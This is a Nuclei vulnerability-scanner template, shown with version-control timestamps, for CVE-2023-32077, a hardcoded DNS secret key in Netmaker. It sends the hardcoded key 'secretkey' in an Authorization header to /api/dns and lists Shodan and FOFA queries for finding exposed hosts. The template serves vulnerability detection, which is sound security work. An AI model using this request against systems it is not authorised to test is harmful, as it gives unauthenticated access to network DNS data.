nuclei-templates/http/cves/2023/CVE-2023-32077.yaml

43 lines
1.3 KiB
YAML
Raw Normal View History

2024-04-29 12:59:55 +00:00
id: CVE-2023-32077
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
info:
name: Netmaker - Hardcoded DNS Secret Key
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
Netmaker makes networks with WireGuard. Prior to versions 0.17.1 and 0.18.6, hardcoded DNS key usage has been found in Netmaker allowing unauth users to interact with DNS API endpoints.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-32077
2024-05-31 19:23:20 +00:00
cwe-id: CWE-798,CWE-321
epss-score: 0.08146
epss-percentile: 0.94315
2024-04-29 12:59:55 +00:00
cpe: cpe:2.3:a:gravitl:netmaker:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: gravitl
product: netmaker
shodan-query:
- html:"netmaker"
- http.html:"netmaker"
2024-05-31 19:23:20 +00:00
fofa-query: body="netmaker"
tags: cve,cve2023,info-key,netmaker,exposure,gravitl
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
http:
- method: GET
path:
- "{{BaseURL}}/api/dns"
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
headers:
Authorization: "x secretkey"
2024-04-29 12:54:31 +00:00
2024-04-29 12:59:55 +00:00
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(header, "application/json")'
2024-04-30 06:14:34 +00:00
- 'contains_all(body, "{\"address\":", "\"network\":", "\"name\":")'
2024-04-29 12:59:55 +00:00
condition: and
# digest: 490a00463044022022bb6a32bbe67ce63f09a569ea77dbc532a426bb9ee2a6e51aceb5faf05842a40220632654660f5d4f4a8430ed0af848009258f9b5297792356180d1c9f6dfca60d6:922c64590222798bb761d5b6d8e72950